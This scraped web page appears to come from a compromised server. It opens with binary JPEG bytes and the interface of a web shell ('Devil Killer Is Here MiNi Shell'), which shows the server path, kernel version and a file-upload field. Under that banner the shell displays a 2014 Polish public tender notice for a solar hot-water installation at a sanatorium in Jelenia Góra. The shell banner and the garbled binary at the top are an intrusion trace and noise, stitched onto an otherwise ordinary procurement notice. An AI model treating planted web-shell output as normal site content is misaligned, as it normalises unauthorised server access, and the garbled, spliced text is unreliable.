JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140311/51087-N-2014.html

<p class="kh_header"><b>Jelenia Góra: WYKONANIE INSTALACJI SOLARNEJ  WSPOMAGAJĄCEJ  PRZYGOTOWANIE CIEPŁEJ WODY UŻYTKOWEJ DLA OBIEKTU  SP ZOZ  SANATORIUM UZDROWISKOWEGO MSW AGAT
W JELENIEJ GORZE , UL. CERVI 14</b><br>
<b>Numer ogłoszenia: 51087 - 2014; data zamieszczenia: 11.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW w Jeleniej Górze , ul. Cervi 14, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 75 7552064 w.4026, faks 75 7551093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatorium-agat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE INSTALACJI SOLARNEJ  WSPOMAGAJĄCEJ  PRZYGOTOWANIE CIEPŁEJ WODY UŻYTKOWEJ DLA OBIEKTU  SP ZOZ  SANATORIUM UZDROWISKOWEGO MSW AGAT
W JELENIEJ GORZE , UL. CERVI 14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie instalacji solarnej wspomagającej przygotowanie ciepłej wody użytkowej dla obiektu SP ZOZ Sanatorium Uzdrowiskowe MSW AGATw Jeleniej Górze przy ul. Cervi 14.
Wg opisu w PB:  
Budynek  Sanatorium AGAT  jest obiektem wolnostojącym z pięcioma kondygnacjami naziemnymi w części głównej i trzema- w części gastronomiczno-zabiegowej. Obiekt w chwili obecnej zasilany jest w ciepło,  z sieci ciepłowniczej preizolowanej 2xDN150, z ciepłowni miejskiej ECO Jelenia Góra.  Budynek posiada  instalację c.o., c.w.u. i cyrkulacyjną, wentylację mechaniczną w części gastronomicznej budynku oraz wentylację grawitacyjną pozostałych pomieszczeń.  Wyposażony jest również   w przyłącza i instalację wod-kan., gazową oraz elektryczną. 
W pomieszczeniach technicznych w przyziemiu zlokalizowane są węzły cieplne c.o. oraz c.w.u.                      
 W pomieszczeniu obok /nr 48/ zlokalizowana będzie projektowana wymiennikownia solarna. Projektowana wymiennikownia  korzystać będzie z istniejących w budynku instalacji wewnętrznych w oparciu                           o dotychczasowe warunki techniczne dostawy gazu, wody i energii elektrycznej oraz odprowadzenia ścieków.

2.	Zakres rzeczowy planowanego przedsięwzięcia:
      2.1.  instalacja solarna wykonana z rur  stalowych, ocynkowanej zewnętrznie, z zasobnikami buforowymi wody grzejnej  i wymiennikami ciepła (ładującymi i rozładowującymi baterię buforów) 
(a)	główne rurociągi, sprowadzające czynnik grzewczy z pionów instalacji solarnej do pomieszczenia wymiennikowni  prowadzone pod stropami pomieszczeń przyziemia, wzdłuż podciągów,          
(b)	piony  instalacji solarnej wykonane w lekkiej zabudowie płytami gipsowo-kartonowymi,  
                    (c)    przewody  w posadzkach pomieszczeń prowadzone w rurach osłonowych, 
      2.2   instalacja wody  grzewczej  ładowania i rozładowania zbiorników buforowych, wykonana  z rur stalowych bez szwu;
      2.3    instalacja wody zimnej i c.w.uż;
      2.4    zabezpieczenie instalacji c.w.uż. przed Legionellą;
       2.5   odpowietrzenie instalacji solarnej poprzez separatory powietrza i zawory odpowietrzające;
       2.6   układ solarny zasilany przez 143 płyty płaskich kolektorów słonecznych, o  pow. brutto 2,38m2 każda,   
              połączone w 34 baterie w zestawach  montażowych 2,5,4  dedykowanych dla dachu płaskiego, na konstrukcji wsporczej w postaci rusztu stalowego;






      2.7   układ technologiczny  wspomagający produkcję c.w.u. oparty na ośmiu zbiornikach buforowych c.w.uż, 
  o pojemności 2000l każdy oraz trzech zbiornikach wstępnego podgrzewu c.w.uż. o poj. 1000l każdy,       zainstalowany w przyziemiu - w pomieszczeniu wymiennikowi; 
      2.8   zapewnienie przepływu  płynu solarnego w instalacji przez  grupy pompowe:
(a)	obieg budynku głównego Hp=75,8kPa, V=5,168m3/h
(b)  obieg budynku gastronomicznego  i zabiegowego Hp=60,0 kPa, V=3,53m3/h
2.9   opomiarowanie uzyskiwanej ilości energii cieplnej z instalacji solarnej;
2.9   instalacje elektryczne zasilania energią elektryczną pomieszczenia z zamontowanymi zbiornikami układu
        solarnego do podgrzewu c.w.uż.
     2.10  likwidacja wszelkich powstałych podczas wykonywanych prac zniszczeń, uszkodzeń oraz zabrudzeń, 
               w pomieszczeniach, przez które  prowadzono instalacje solarne i/lub piony instalacji solarnej, 
               Nie dotyczy to pomieszczenia wymiennikowni, dla którego zakres robot budowlanych określa Dokumentacja
                 projektowa.                
      2.11. przeprowadzenie, ze skutkiem pozytywnym, 72godzinnego rozruchu próbnego.

3.	 Ww. zakres robót ma jedynie charakter poglądowy. Szczegółowy opis przedmiotu zamówienia zawarty jest       w Części III. Specyfikacji Istotnych Warunków Zamówienia pn. Opis przedmiotu zamówienia, ogólnie zwanym Dokumentacją projektową. 
4.Celem  dostosowania zapisów w Dokumentacji projektowej do wymogów art. 30 upzp., bez konieczności poprawiania Opracowania  - Projektant  sporządził  Erratę stanowiącą plik oznaczony jako [8], którą należy czytać łącznie z zapisami w Dokumentacji projektowej. 
 5. Wymagany okres gwarancji jakości  dla całego przedmiotu zamówienia  - minimum 60 miesięcy , licząc od dnia podpisania bezusterkowego protokołu odbioru przedmiotu zamówienia, z wyłączeniem kolektorów słonecznych, dla których okres gwarancji jakości wynosi 10lat, licząc od dnia podpisania bezusterkowego protokołu odbioru przedmiotu zamówienia.

6. Zamawiający, w oparciu o art. 36a. ust.2 upzp, żąda  osobistego wykonania przez wykonawcę  instalacji technologicznej łącznie z solarami,  przez którą należy rozumieć wszystkie roboty budowlane z wyłączeniem:  automatyki, robót instalacji elektrycznej, robót wykończeniowych,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.00-8, 45.33.10.00-6, 45.31.12.00-2, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 153.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości:
20 000     PLN    (słownie: dwadzieścia tysięcy złotych  )
2. Wadium może być wniesione w następujących formach:
a)	 pieniądzu
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	  gwarancjach bankowych,
d)	  gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275, z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń  -  dokumenty te powinny    być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji lub poręczenia ( Zamawiającego), gwaranta ( banku lub instytucji udzielających gwarancji lub poręczenia ) oraz wskazanie ich siedzib,
b)	  określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	  kwotę gwarancji lub poręczenia,
d)	  termin ważności gwarancji lub poręczenia ,
  e)   zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia  kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :
- że wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp. nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie,
lub
-  że wykonawca , którego ofertę wybrano:
        - odmówił podpisania umowy na warunkach określonych w ofercie,     lub
        - nie wniósł zabezpieczenia należytego wykonania umowy,    lub
        - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
W przypadku, gdy gwarancje lub poręczenia nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.


4.   Wadium w formie gwarancji  lub poręczeń nie podlega przeniesieniu na osoby trzecie.

5.  Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty  w  PLN : B.Z. WBK S.A.  3 O. Jelenia Góra,  numer konta 59 1090 2633 0000 0006 5601 1440, z adnotacją
      w tytule wpłaty :  Wadium-instalacja solarna_ III 2014.

 6. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie /formach wykonawca może  dołączyć do oferty - pod warunkiem,  że umieszczone zostanie w osobnej  kopercie  opisanej ( nazwa wykonawcy, adnotacja: Wadium --instalacja solarna_ III 2014).

7.  Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia wykazu  wykonanych robót budowlanych   w okresie ostatnich 5 lat przed upływem terminu  składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz                   
             z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. 
             Decyzja, które roboty budowlane widniejące w ww. wykazie są najważniejsze, pozostawiona jest 
             Wykonawcy, z zastrzeżeniem treści zdania następnego.

Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie                  i wykazane w ww. Wykazie realizacje, z których co najmniej dwie(2) dotyczą robót budowlanych polegających na wykonaniu systemów solarnych na bazie płaskich kolektorów słonecznych wspartych na konstrukcji stalowej, z których co najmniej jeden (1) pakiet płaskich kolektorów słonecznych  jest                 o powierzchni minimum  200 m2 absorbera pakietu solarnego,  i które zostały poparte  załączonymi ww. dowodami wydanymi przez podmiot na rzecz którego te roboty budowlane zostały wykonane</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osoby odpowiedzialne za kierowanie robotami budowlanymi:

(a)	Kierownika Budowy   posiadającego :
                         -  co najmniej 36miesięczne doświadczenie zawodowe na stanowisku kierownika budowy, 
          - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności        konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
 (b)     Kierownika robót lub majstra robót posiadającego: 
                        - co najmniej 36miesięczne  doświadczenie zawodowe na stanowisku kierownika budowy i/lub    
                           kierownika robót i/lub majstra robót, w zakresie posiadanych uprawnień,
         - uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej 
            w zakresie  sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych 
             i kanalizacyjnych bez   ograniczeń  lub   odpowiadające im ważne  uprawnienia budowlane,  które   
zostały wydane na podstawie wcześniej wydanych przepisów, z wyłączeniem sieci i instalacji gazowych,
                (c)       Kierownika robót lub majstra robót,  posiadającego :
   - co najmniej 24miesięczne doświadczenie zawodowe na stanowisku kierownika budowy i/lub    kierownika  robót i/lub majstra robót,
         - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej                 w zakresie sieci,  instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów, z wyłączeniem sieci.
                 (d)      Inżynier ds. AKPiA 
                          - posiadający wykształcenie wyższe techniczne w specjalności automatyka lub automatyka  
                              i pomiary lub elektronika lub elektryczne i mający doświadczenie zawodowe  w  sprawowaniu lub kierowaniu robotami AKPiA w co najmniej dwóch zamówieniach z zakresu gospodarki grzewczej   i/lub wentylacyjnej. 

Zamawiający dopuszcza posiadanie uprawnień w ww. branżach przez jedną, dwie lub trzy osoby pod warunkiem, że zostaną odpowiednio wskazane do pełnienia funkcji zgodnie z  zakresem odpowiadającym ich uprawnieniom.
         Przez wymagany  minimalny okres  doświadczenia zawodowego  należy rozumieć łączną ilość przepracowanych miesięcy, liczonych od daty uzyskania uprawnień budowlanych do daty ukazania się Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych 
Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.

Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie       i wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i zdolnością kredytową)  - w wysokości co najmniej 600 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej               z przedmiotem zamówienia na kwotę minimum  1 000 000 PLN,
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w punktach od 1.1 do 1.3 winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy występujący wspólnie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej dwie(2) realizacje muszą dotyczyć  robót budowlanych polegających na wykonaniu systemów solarnych na bazie płaskich kolektorów słonecznych wspartych na konstrukcji stalowej, z których co najmniej jeden (1) pakiet płaskich kolektorów słonecznych  jest o powierzchni minimum  200 m2 absorbera pakietu solarnego,  i które zostały poparte  załączonymi  dowodami określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone, wydanymi przez podmiot na rzecz którego te roboty budowlane zostały wykonane;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - wg wzoru stanowiącego Załącznik nr 7;
(b)	Informację banku  lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert- jeżeli udostępnia zasoby finansowe</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :
  1.1   zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Cz. I IDW,
  1.2    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub podwykonawcy          podwykonawcy,  
  1.3  rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy, który nie podlega sprawdzeniu ani ocenie i stanowi opracowanie pomocnicze do umowy  i sporządzania wymaganych dokumentów dla Dotującego Zadanie.
      1.4  wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                         w Dokumentacji projektowej, nie powodujących zmiany umownej ceny,





1.5	    konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych, technologicznych            lub materiałowych niż wskazane w Dokumentacji projektowej  w sytuacji,  gdyby zastosowanie dotychczasowych rozwiązań groziłoby  nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy możliwości  zmiany wynagrodzenia na zasadach określonych w punktach  1.3,  1.4, 
1.6	  pojawienia się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zmniejszenie kosztów realizacji Robót lub umożliwiających uzyskanie lepszej jakości lub  efektywności układu solarnego,
1.7	konieczności wykonania Robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany Przepisów Prawa,
1.8	   opóźnienie przekazania wykonawcy terenu budowy o co najmniej 7dni w stosunku do terminu określonego w umowie,
1.9	   urzędowej zmiany stawki podatku od towarów i usług (VAT) w stosunku do stawki obowiązującej w dniu upływu terminu składania ofert - dotyczy tylko robót budowlanych wykonanych  i fakturowanych po dacie wprowadzenia nowej stawki od towarów i usług (VAT)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
